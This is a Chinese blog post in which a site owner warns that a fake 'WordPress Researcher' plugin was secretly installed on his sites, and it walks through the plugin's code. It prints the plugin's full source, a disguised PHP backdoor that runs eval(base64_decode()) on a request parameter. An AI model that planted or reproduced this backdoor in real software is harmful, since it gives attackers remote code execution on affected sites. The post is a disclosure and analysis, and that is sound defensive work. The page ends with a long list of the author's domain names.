6

WTF!WordPresshacked~

Posted by Chen Hongbin on 2014-08-03 in 计算机网络 |

wp_hack

大家警惕!看看是否有一个叫 WordPress Researcher的插件!

查看了一下插件的安装日期是7月24日下午2点,WTF那个时候我在上班啊!所以我一开始就感觉不对。我一个有3个网站被强行安装上了:a.cx,cny.club,a.cx

我的wordpress版本都是最新的,而且也没有安装什么乱七八糟的插件,都是来自官网。

现在思考下来,hacked的原因只有2个:

1)Wordpress本身的程序漏洞。从Wordpress的前科看,这个可能性很大,Wordpress屡屡爆出hacked,毕竟是全球性的开源程序,有很多黑客在研究Wordpress

2)我自己的密码泄露。感觉这个可能性不大,我一般都是在自己家里管理Wordpress的。但是有那么一丝可能性,因为我在单位电脑登录过,那么单位电脑有木马病毒什么的还要进一步去侦查。但是,如果有木马,那也是“国产货”专门盗游戏密码什么的,我区区一个Wordpress值得他盗么?所以也不太可能。

深思熟虑下来,一的可能性占到99%。

附上该插件的源代码:

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later – http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
Copyright 2013  wordpressdotorg
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
    function research_plugin()
    {
        if (isset($_REQUEST[‘JQIW’]))
        {
            eval(base64_decode($_REQUEST[‘JQIW’]));
        }
        return;
    }
    add_action(‘after_setup_theme’, ‘research_plugin’);
?>

解析一下代码:

一共就2个函数

第一函数 research_plugin()  先是判断是否定义过$_REQUEST[‘JQIW’]

$_REQUEST是一个超全局变量,里面包括有
$_GET
$_POST
$_COOKIE

功能是接受表单, ‘JQIW’

如果是,那么他开始编码

例子

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出:

This is a $string $time morning!
This is a beautiful winter morning!

第二个函数是一个动作

WordPress有一个叫做after_setup_theme的动作hook。一旦父/子主题的功能文件加载完毕,这个hook也会被执行。after_setup_theme是一个非常实用的hook,WordPress默认主题TwentyTen也使用了这个hook。

add_action( 'after_setup_theme', 'browncoats_theme_setup' );

6 Comments

Comments are closed. Would you like to contact the author directly?

版权所有 © 2009-2024 不知道起什么标题 A.CX / Q.ST / Z.ST / 6.LS / WO.GS 本人保留本站所有权利

我并不是一个炒域名的,80%的情况,我都是为自己以后新的商业方向在屯域名,更多的是考虑商业用途。
总的原则是:我可以不用,但是先屯着,哪天启用不知道。就是玩。
玩域名从不拉帮结派,就是一个人独乐乐,哈哈

e.sh.cn / e.he.cn / a.gs.cn / a.nx.cn / a.jl.cn

a.xz.cn / a.sn.cn / a.he.cn / a.yn.cn

 
全球/亲亲/群群/钱钱/齐全/期权/秋千/恰恰/圈圈/瞧瞧 qqo.cn
 
业务/英文/语文/衣物/愿望/运维/原味/游玩/医务/约我 ywo.cn
 
金网盘/金王牌/金网评/金旺铺/家网盘/今晚拍/酒唯品 jwp.cn
 
游戏牛/邮箱牛/云虚拟/云性能/云想你/云校内/云效能 yxn.cn
 
游戏/邮箱/英雄/营销/医学/印象/运行/优先/院校/影像 yxa.cn
 
                            对应cc域名: yxa.cc
游戏酷 YX.COOL
 
 
6G网! 6GW.cn
 
 
AI人工智能 ai.st / ai.gy / zai.ee / gai.ee / cai.ee/ kuai.ee
xaim.cn / 大AI网daiw.cn / AI雄安/西安aixa.cn / AI World Record aiwr.cn / aitv.cc
AI AIM目标aiaim.cn / oaiw.cn / oaiz.cn / eaio.cn/ AI文档/网点/网店aiwd.cn
钛网/ 太旺/TW你懂的taiw.cn / 中国AI在意zaiy.cnzaie.cn / AI少年少女/爱上你aisn.cn
AI网购/爱网购aiwg.cn / AI官方/AIGFaigf.cn / efai.cn / rair.cn / waij.cn

AI星际ai.xj.cn

AI公司ai.gs.cn

ML机器学习 ml.mba / ml.sh.cn / mLnn.cn / mLps.cn / qmL.cc / LmL.cc

APP系列

VR/XR/MR vr.st / vrk.cc / xrd.cc / vrc.gs / xrf.cc / XRA某种币吧xra.cc
MR.H/猛如虎/美如画 mrh.cc / mxr.cc / MR.sh.cn MR上海 / gvr.cc / mra.cc
CHINA MR 中国MR cmr.cc / kmr.cc / VRGame vrg.cc/ 拍VR pvr.cc / 电竞MR djmr.cn
元宇宙 yuan.st / yuan.ee / imeta.ee
 

云计算 YUN.gs / YUN.ee / YUN.st / YUN.sx / YUN.gd / YUN.wf

卫星/微信系列: 发卫星/微信fwx.cc / 微信购wxg.cc / 搞卫星 gwx.cc

秒卫星mwx.cc / 卫星公司 wx.gs / 卫星磁 wx.ci
GS股市易/公司易 GS.EE / GS.cx / GS.ci
 
东西/大学/电信/对象/短信/大侠 dx.gs
QP全品汇/青浦 qp.gs / XH徐汇/协会 xh.gs
RH融合/融汇 rh.gs
HN海南/华南 hn.gs / 排期 聘请 票圈 喷泉 排球 pq.gs
童年 天能 头脑 tn.gs /气氛 群发 祈福 恰饭 qf.gs
押宝/抵押/质押/压注/牙齿 YA.gs
付/服/富/福/复/辅 FU.gs
xin概念 xin.st / xin.sx / xin.mx / xin.gd / xin.cm
金融类 sh.vc / cf.cx / ebank.xin / fei.ee
科技/空间/开奖/快捷/跨境查询/科技创新 KJ.CX
户籍/环境/黄金/获奖/幻境查询/创新 hj.cx
工业/公园/公寓/供应/工艺/公用/公益查询/创新 gy.cx
壁纸/标志/标准/包装/币种/保障/博主查询/创新 bz.cx
版权/表情/标签/百强/便签/百强/霸气查询/创新 bq.cx
客户/开户/科幻/狂欢查询/创新 kh.cx
百日/百融/百润/百荣查询/创新 br.cx
名牌/门牌/米铺/名片查询/创新 mp.cx
商务/事务/税务/食物/思维/上网查询/创新 sw.cx
法律/返利/福利/风冷/分类/风力查询/创新 fl.cx
业务/药物/衣物/愿望/运维/英文查询/创新 yw.cx
信号/笑话/协会/现货/玄幻/虚幻查询/创新 xh.cx
资本/直播/周边/主播/指标/装备/主板查询/创新 zb.cx
账期/证券/债权/赚钱/足球/桌球/中签查询/创新 zq.cx
网游/网页/网银/物业/网友/文艺/唯一查询/创新 wy.cx
HR人力资源查询/火热创新 HR.cx

汽车行业 che.cx

房产讯/房查询/房车行 fcx.cc
类淘宝/网购/团购行业 tao.gs / tao.pm / tuan.gs

CCC酒吧ccc.pub

PC机/评测家PCJ.cc / 机器网jqw.cc

拍域名/朋友们pym.cc

发短信fdx.cc / 中国店zgd.cc

NEED FOR SPEED! NFS.cc 极品飞车

科技X kjx.cc / 柔性屏 rxp.cc

A电竞/adj形容词adj.cc

站酷酷zkk.cc / 玩网游wwy.cc /放飞区ffq.cc /逛逛街ggj.cc

MMU mmu.cc / 汉化风hhf.cc/ VXX vxx.cc/ UUX uux.cc

共享经济 gxt.cc / 人才行rcx.cc / X私募xpe.cc
上海/香港 shk.cc / 宝上海/播生活 bsh.cc / 微上海/微生活 vsh.cc / 趣上海qsh.cc
中国online zgo.cc / 浦西online pxo.cc / 浦东online pdo.cc
幸运日 xyr.cc / 每一天 myt.cc
N邮箱/游戏 nyx.cc / C邮箱/游戏 cyx.cc
总排名/总拍卖 zpm.cc
 
city 城市类 mo.city / bao.city / wode.city/ kuai.city
大上海/生活 mmsh.cn / ppsh.cn /kqsh.cn / shc.ren
上海知识产权ipsh.cn / ktsh.cn / rdsh.cn / pmsh.cn / you.sh.cn
文化上海/五湖四海whsh.cn / kk.sh.cn /ii.sh.cn / pe.sh.cn / yx.sh.cn
ms.sh.cn / ar.sh.cn / pc.sh.cn / 大上海(DASH的HACK)da.sh.cn
WASH的HACKwa.sh.cn / LUSH的HACKlu.sh.cn
网站门户类 csb.wang / bat.wang / cxz.wang
淘宝巴巴tbbb.net
 
夜生活类 ye.ee / 夜上海ye.sh.cn/ 夜灵YE0.cn / YEE yee.cc
 
ci /词系列 aa.ci /lx.ci / gj.ci / gs.ci / xs.ci / ico.ci
大中华 CHINA.LT
其他商业用途 xsq.cc / wrg.cc / jxp.cc / cwk.cc / scd.cc / wpi.cc / ith.cc
ist.cc / kwz.cc / zmy.cc / ciw.cc / OT中国otcn.cn / 社区/商圈sqcn.cn
DV中国dvcn.cn / PC牛人pcnr.cn
微社团wei.st / 173.pm / riso.vip / PCO.LTD
 
酒吧98.st / 依旧19.st / 域名ym.st
 
 
人人rr.st / 游游uu.st / 合伙hh.st
 
 
一二三123.gd
 
万维时空wwsk.cn / 万维美居wwmj.cn / 完美时光wmsg.cn/ 分公司fen.gs
 
私人用途 wo.gs / zis.cc / chen.ee / 霸气ba7.cn / 6vd.cn / am6.cn
All Included.

中华人民共和国 网站备案号(工信部暨公安部):
 

Top